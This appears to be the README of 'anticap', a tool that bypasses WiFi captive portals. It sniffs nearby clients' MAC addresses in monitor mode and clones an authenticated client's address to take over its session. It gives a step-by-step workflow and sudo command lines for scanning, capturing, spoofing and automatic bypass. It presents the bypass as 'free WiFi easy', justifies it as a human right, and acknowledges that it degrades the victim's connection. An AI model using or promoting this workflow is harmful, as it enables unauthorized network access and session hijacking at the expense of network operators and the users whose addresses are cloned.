Bypass captive portals and get free WiFi easy 😝
Today people have forgotten that Internet access is a basic human right. Admins who "just do their job" place captive portals with ads, phone number verification, and other abominations on otherwise open WiFi networks. This tool is made to overcome that inconvenience.
This tool leverages 802.11 wireless protocol monitor mode to passively capture frames (packets) from all devices operating within range of the target access point (WiFi router). Each captured frame contains the client source MAC address. Captive portal implementations typically rely on MAC address-based authentication to maintain session state and enforce access control policies. By cloning the MAC address of an authenticated client, it becomes possible to inherit their existing authorization context and bypass the captive portal authentication mechanism.
It should be noted that simultaneous usage of a spoofed MAC address while the legitimate client remains active will result in address conflicts and subsequent packet collisions. This will degrades network performance for both parties as the access point cannot deterministically send frames to the correct physical device. (the person who is closer to WiFi router will have much better time)
The general workflow consists of several steps:
Capture packets in monitor mode for a given WiFi network to discover connected devices. All captured MACs are stored as JSON text files in store directory for later access.
Note that anticap also maintains a cache of discovered networks in store/networks/{bssid}.json. This cache maps BSSIDs to their SSIDs and channels.
Spoof your MAC to every discovered address and try to ping external server to find if internet access is available. For each address N pings will be performed to determine a rating score. The higher the number of successful ping the higher the score.
If tester MAC address has an Internet connection set it as your current one.
./build.sh
anticap uses a subcommand-based interface. Use -h flag with any command to get more help on available options.
Full process: packet capture, MAC spoof, and connection testing
sudo ./build/anticap bypass -t <BSSID> [-ch <channel>] [-s <SSID>] [-i <interface>] [-n <num_packets>] [-v]
-t: Target BSSID-ch: Target channel-s: Manually specify SSID-i: Interface name-n: Number of packets to capture-v: Verbose output
Scan available WiFi networks and populate cache
sudo ./build/anticap scan [-5g] [-t <milliseconds>] [-s] [-i <interface>] [-v]
-5g: Include 5GHz channels-t: Scan time per channel in milliseconds-s: Save discovered networks to cache-i: Interface name-v: Verbose output
Run packet capture only (no MAC spoofing)
sudo ./build/anticap capture -t <BSSID> [-ch <channel>] [-i <interface>] [-n <num_packets>] [-v]
Join a specified WiFi network
sudo ./build/anticap join <SSID> [-p <password>] [-v]
Reset interface to original MAC address
sudo ./build/anticap reset [-i <interface>] [-v]
Set interface MAC address
sudo ./build/anticap setmac <MAC_ADDRESS> [-i <interface>] [-v]
List stored captures for target MAC (works without root)
./build/anticap list -t <BSSID> [-v]